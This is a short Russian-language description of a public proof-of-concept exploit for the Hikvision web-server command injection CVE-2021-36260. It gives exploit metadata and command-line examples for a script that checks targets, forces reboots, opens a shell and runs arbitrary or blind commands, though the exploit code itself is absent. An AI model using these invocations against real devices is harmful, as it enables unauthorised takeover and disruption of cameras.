
уязвимость внедрения команд в веб-сервере некоторых продуктов Hikvision. Из-за недостаточной проверки входных данных злоумышленник может использовать эту уязвимость для запуска атаки внедрения команд, отправляя некоторые сообщения с вредоносными командами.
CVE-2021-36260 POC - уязвимость внедрения команд в веб-сервере некоторых продуктов Hikvision. Из-за недостаточной проверки входных данных злоумышленник может использовать уязвимость для проведения атаки путем внедрения команд, отправляя сообщения с вредоносными командами.
Название эксплойта: Hikvision Web Server Build 210702 - Внедрение команд
Автор эксплойта: bashis
Домашняя страница вендора: https://www.hikvision.com/
Версия: 1.0
CVE: CVE-2021-36260
Ссылка: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
Примечание:
[Примеры] Безопасная проверка уязвимости/верификация: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
Безопасная и небезопасная проверка уязвимости/верификация: (будет использовать 'unsafe check' только если не пройдена проверка с помощью 'safe check') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
Небезопасная проверка уязвимости/верификация: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
Запуск и подключение к SSH-оболочке: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
Выполнить команду: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
Выполнить слепую команду: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"